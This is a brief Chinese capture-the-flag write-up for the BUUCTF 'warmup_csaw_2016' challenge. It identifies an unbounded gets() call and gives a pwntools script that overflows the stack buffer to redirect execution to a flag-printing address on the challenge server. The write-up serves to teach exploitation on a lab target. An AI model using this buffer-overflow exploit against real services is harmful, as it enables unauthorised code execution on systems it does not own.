buuctf-warmup_csaw_2016

拿到文件,先checksec,沒開啟保護(hù)。

圖片.png

運(yùn)行,


圖片.png

IDA查看,main函數(shù)中,可解讀,gets沒有限制輸入長度,存在溢出。


圖片.png
圖片.png

payload:

from pwn import *
r=remote("node3.buuoj.cn",29434)
flag_addr=0x40060D
payload='a'*(0x40+8)+p64(flag_addr)
r.sendline(payload)
r.interactive()
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

友情鏈接更多精彩內(nèi)容